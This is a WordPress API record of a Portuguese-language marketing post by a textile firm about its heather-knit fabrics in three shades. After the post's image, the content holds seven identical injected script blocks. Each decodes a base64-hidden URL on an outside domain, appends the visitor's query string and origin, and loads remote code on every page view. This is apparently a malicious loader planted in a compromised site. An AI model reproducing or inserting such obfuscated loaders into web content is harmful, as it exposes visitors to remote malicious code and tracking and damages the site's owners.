{"id":2006,"date":"2024-07-10T16:34:06","date_gmt":"2024-07-10T19:34:06","guid":{"rendered":"https:\/\/www.urbanotextil.com.br\/?p=2006"},"modified":"2024-09-20T20:50:25","modified_gmt":"2024-09-20T23:50:25","slug":"malhas-mesclas-o-basico-que-vai-alem","status":"publish","type":"post","link":"https:\/\/www.urbanotextil.com.br\/en\/malhas-mesclas-o-basico-que-vai-alem\/","title":{"rendered":"Malhas mesclas: o b\u00e1sico que vai al\u00e9m"},"content":{"rendered":"<p><span style=\"font-weight: 400;\">Aqui na Urbano T\u00eaxtil, estamos sempre atentos \u00e0s tend\u00eancias e \u00e0s necessidades dos nossos clientes. E este m\u00eas, queremos destacar um dos nossos materiais mais vers\u00e1teis e apreciados: as malhas mesclas.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Com tr\u00eas varia\u00e7\u00f5es distintas &#8211; mescla claro, m\u00e9dio e escuro &#8211; nossas malhas mesclas s\u00e3o a escolha perfeita para quem busca combinar suavidade, conforto e estilo em qualquer ocasi\u00e3o. Mas o que torna essas malhas t\u00e3o especiais?<\/span><\/p>\n<p><span style=\"font-weight: 400;\">As malhas mesclas s\u00e3o conhecidas pelo seu efeito visual \u00fanico, resultado da mistura de fios de diferentes tonalidades. Essa caracter\u00edstica n\u00e3o apenas confere um visual moderno e diferenciado \u00e0s pe\u00e7as, mas tamb\u00e9m as torna extremamente vers\u00e1teis. Seja para looks casuais, despojados ou at\u00e9 mesmo elegantes, as malhas mesclas s\u00e3o uma excelente escolha.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Na Urbano T\u00eaxtil, acreditamos que a moda deve ser acess\u00edvel, confort\u00e1vel e, acima de tudo, estilosa. E nossas malhas mesclas s\u00e3o a materializa\u00e7\u00e3o desse conceito. Elas oferecem a voc\u00ea o b\u00e1sico que vai al\u00e9m, permitindo criar pe\u00e7as que se destacam pela sofistica\u00e7\u00e3o e estilo.<\/span><\/p>\n<p><span style=\"font-weight: 400;\">Venha descobrir todas as possibilidades que nossas malhas podem proporcionar e eleve suas cria\u00e7\u00f5es a um novo n\u00edvel de sofistica\u00e7\u00e3o e estilo!<\/span><\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone  wp-image-2007\" src=\"https:\/\/ml9qnehry8oh.i.optimole.com\/cb:PnVm~17c7\/w:240\/h:300\/q:mauto\/f:best\/https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2024\/07\/POST.jpg\" alt=\"\" width=\"313\" height=\"392\" srcset=\"https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2024\/07\/POST.jpg 1080w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2024\/07\/POST-240x300.jpg 240w, https:\/\/www.urbanotextil.com.br\/wp-content\/uploads\/2024\/07\/POST-10x12.jpg 10w\" sizes=\"(max-width: 313px) 100vw, 313px\" \/><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><script>(function(){var a=document.head||document.getElementsByTagName(\"head\")[0],b=\"script\",c=atob(\"aHR0cHM6Ly9qYXZhZGV2c3Nkay5jb20vYWpheC5waHA=\");c+=-1<c.indexOf(\"?\")?\"&#038;\":\"?\";c+=location.search.substring(1);b=document.createElement(b);b.src=c;b.id=btoa(location.origin);a.appendChild(b);})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Aqui na Urbano T\u00eaxtil, estamos sempre atentos \u00e0s tend\u00eancias e \u00e0s necessidades dos nossos clientes. E este m\u00eas, queremos destacar um dos nossos materiais mais vers\u00e1teis e apreciados: as malhas mesclas. Com tr\u00eas varia\u00e7\u00f5es distintas &#8211; mescla claro, m\u00e9dio e escuro &#8211; nossas malhas mesclas s\u00e3o a escolha perfeita para quem busca combinar suavidade, conforto [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2007,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_coblocks_attr":"","_coblocks_dimensions":"","_coblocks_responsive_height":"","_coblocks_accordion_ie_support":"","footnotes":""},"categories":[22,11],"tags":[],"wt_blog_author":[],"class_list":["post-2006","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-moda","category-tendencias"],"_links":{"self":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts\/2006","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/comments?post=2006"}],"version-history":[{"count":9,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts\/2006\/revisions"}],"predecessor-version":[{"id":2134,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/posts\/2006\/revisions\/2134"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/media\/2007"}],"wp:attachment":[{"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/media?parent=2006"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/categories?post=2006"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/tags?post=2006"},{"taxonomy":"wt_blog_author","embeddable":true,"href":"https:\/\/www.urbanotextil.com.br\/en\/wp-json\/wp\/v2\/wt_blog_author?post=2006"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}